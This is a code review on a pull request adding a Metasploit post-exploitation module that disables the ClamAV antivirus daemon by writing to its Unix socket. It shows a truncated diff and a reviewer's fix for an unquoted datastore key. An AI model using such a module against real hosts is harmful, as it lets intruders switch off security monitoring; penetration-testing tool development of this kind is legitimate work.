modules/post/linux/manage/disable_clamav.rb

```diff
@@ -0,0 +1,46 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'socket'
+class MetasploitModule < Msf::Post
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(_info = {})
+    super(
+      'Name' => 'Disable ClamAV',
+      'Description' => %q{
+          This module will write to the ClamAV Unix socket to shutoff ClamAV.
+        },
+      'License' => MSF_LICENSE,
+      'Author' => [
+        'DLL_Cool_J'
+      ],
+      'Platform' => [ 'linux' ],
+      'SessionTypes' => [ 'meterpreter', 'shell' ]
+      )
+    register_options(
+      [
+        OptString.new('CLAMAV_UNIX_SOCKET', [true, 'ClamAV unix socket', '/run/clamav/clamd.ctl' ])
+      ]
+    )
+  end
+
+  def run
+    clamav_socket = datastore['CLAMAV_UNIX_SOCKET']
+    print_status("Checking file path #{clamav_socket} exists and is writable... ")
+    if writable?(datastore[CLAMAV_UNIX_SOCKET].to_s)
+      print_good('File does exist and is writable!')
+
+      Socket.unix(datastore[CLAMAV_UNIX_SOCKET].to_s) do |sock|
```

Comment:
```suggestion
    if writable?(clamav_socket)
      print_good('File does exist and is writable!')

      Socket.unix(clamav_socket) do |sock|
```
I was getting a `NameError uninitialized constant ... CLAMAV_UNIX_SOCKET`  because `CLAMAV_UNIX_SOCKET` wasn't in quotation marks. Although because you've already assigned the value of that datastore option to `clamav_socket` that can be used here. Also, it should be fine to remove the `.to_s` because the datastore options is type `OptString`.